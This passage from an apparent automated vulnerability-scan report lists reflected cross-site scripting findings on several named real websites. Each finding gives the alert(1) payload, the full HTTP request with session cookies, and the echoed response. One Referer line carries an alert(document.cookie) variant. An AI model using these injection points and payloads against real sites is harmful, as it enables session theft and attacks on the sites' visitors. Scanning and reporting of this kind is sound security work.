       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - freestyle/optimizerf0633"><script>alert(1)</script>c221bb42d42">
...[SNIP]...

1.126. http://www.internetrix.net/general.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /general.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c3f"><script>alert(1)</script>c379c8587fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /general.cssa1c3f"><script>alert(1)</script>c379c8587fa HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/accreditations/dbcde-panel-member/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.4.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:23:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - general.cssa1c3f"><script>alert(1)</script>c379c8587fa">
...[SNIP]...

1.127. http://www.internetrix.net/optimizer.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /optimizer.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a124a"><script>alert(1)</script>ef5e119e82d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /optimizer.htmla124a"><script>alert(1)</script>ef5e119e82d HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:35 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - optimizer.htmla124a"><script>alert(1)</script>ef5e119e82d">
...[SNIP]...

1.128. http://www.internetrix.net/page/accreditations/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/accreditations/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26036"><script>alert(1)</script>e39a76957d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page26036"><script>alert(1)</script>e39a76957d8/accreditations/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page26036"><script>alert(1)</script>e39a76957d8/accreditations">
...[SNIP]...

1.129. http://www.internetrix.net/page/accreditations/dbcde-panel-member/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/accreditations/dbcde-panel-member/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b35d5"><script>alert(1)</script>635a3313a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageb35d5"><script>alert(1)</script>635a3313a6/accreditations/dbcde-panel-member/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/accreditations/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.4.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:23:55 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pageb35d5"><script>alert(1)</script>635a3313a6/accreditations/dbcde-panel-member">
...[SNIP]...

1.130. http://www.internetrix.net/page/articles/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4291"><script>alert(1)</script>bf8317b02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagec4291"><script>alert(1)</script>bf8317b02a5/articles/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30191


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagec4291"><script>alert(1)</script>bf8317b02a5/articles">
...[SNIP]...

1.131. http://www.internetrix.net/page/articles/latest-news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/latest-news/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac3a"><script>alert(1)</script>4ec4125112c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagebac3a"><script>alert(1)</script>4ec4125112c/articles/latest-news/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.8.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:37 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30244


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagebac3a"><script>alert(1)</script>4ec4125112c/articles/latest-news">
...[SNIP]...

1.132. http://www.internetrix.net/page/articles/newsletters/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/newsletters/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db9e"><script>alert(1)</script>e472d9060e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page3db9e"><script>alert(1)</script>e472d9060e6/articles/newsletters/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/latest-news/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.9.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:58 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page3db9e"><script>alert(1)</script>e472d9060e6/articles/newsletters">
...[SNIP]...

1.133. http://www.internetrix.net/page/contact-us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/contact-us/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3392"><script>alert(1)</script>03fc8cb16ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagec3392"><script>alert(1)</script>03fc8cb16ef/contact-us/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.htmla124a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef5e119e82d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.2.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagec3392"><script>alert(1)</script>03fc8cb16ef/contact-us">
...[SNIP]...

1.134. http://www.internetrix.net/page/contact-us/jobs-at-internetrix/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/contact-us/jobs-at-internetrix/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29490"><script>alert(1)</script>5d04903db96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page29490"><script>alert(1)</script>5d04903db96/contact-us/jobs-at-internetrix/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:57 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page29490"><script>alert(1)</script>5d04903db96/contact-us/jobs-at-internetrix">
...[SNIP]...

1.135. http://www.internetrix.net/page/events/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/events/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44922"><script>alert(1)</script>5a4c4169ffa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page44922"><script>alert(1)</script>5a4c4169ffa/events/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:48 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page44922"><script>alert(1)</script>5a4c4169ffa/events">
...[SNIP]...

1.136. http://www.internetrix.net/page/products/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/products/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4474e"><script>alert(1)</script>dae382dfee4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page4474e"><script>alert(1)</script>dae382dfee4/products/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/latest-news/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.9.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:29 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page4474e"><script>alert(1)</script>dae382dfee4/products">
...[SNIP]...

1.137. http://www.mvtimes.com/marthas-vineyard/article.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e10a1"><script>alert(1)</script>06dfa831a6f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/article.php?id=4030e10a1"><script>alert(1)</script>06dfa831a6f HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 25573

A database error occurredA database error occurredA database error occurred<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="ht
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/article.php?id=4030e10a1"><script>alert(1)</script>06dfa831a6f">
...[SNIP]...

1.138. http://www.mvtimes.com/marthas-vineyard/article.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/article.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c05"><script>alert(1)</script>730302c3221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/article.php?id=4030&98c05"><script>alert(1)</script>730302c3221=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
Referer: http://www.mvtimes.com/marthas-vineyard/directory/?a=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=65942130.1302621734.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=340f9a2f4e744e94e83d808165edd48d; __utma=65942130.1489843502.1302621734.1302621734.1302621734.1; __utmc=65942130; __utmb=65942130.5.10.1302621734

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:17:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 31188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/article.php?id=4030&98c05"><script>alert(1)</script>730302c3221=1">
...[SNIP]...

1.139. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302e4"><script>alert(1)</script>2c94143d614 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/classifieds/110.php/%22onmouseover302e4"><script>alert(1)</script>2c94143d614=prompt(945581)%3E HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:15:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 29379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover302e4"><script>alert(1)</script>2c94143d614=prompt(945581)%3E">
...[SNIP]...

1.140. http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mvtimes.com
Path:   /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e1ab"><script>alert(1)</script>bf94dc26cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E?6e1ab"><script>alert(1)</script>bf94dc26cb6=1 HTTP/1.1
Host: www.mvtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 12 Apr 2011 15:15:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templates/general
...[SNIP]...
<a href="/print/web2printer4.php?img=0&amp;lnk=0&amp;style=/styles/common/print.css&amp;page=http://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%22onmouseover=prompt(945581)%3E?6e1ab"><script>alert(1)</script>bf94dc26cb6=1">
...[SNIP]...

1.141. http://www.wcax.com/Global/link.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wcax.com
Path:   /Global/link.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae67'-alert(1)-'3ecbfdbef18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Global/link.asp?L=408799&1ae67'-alert(1)-'3ecbfdbef18=1 HTTP/1.1
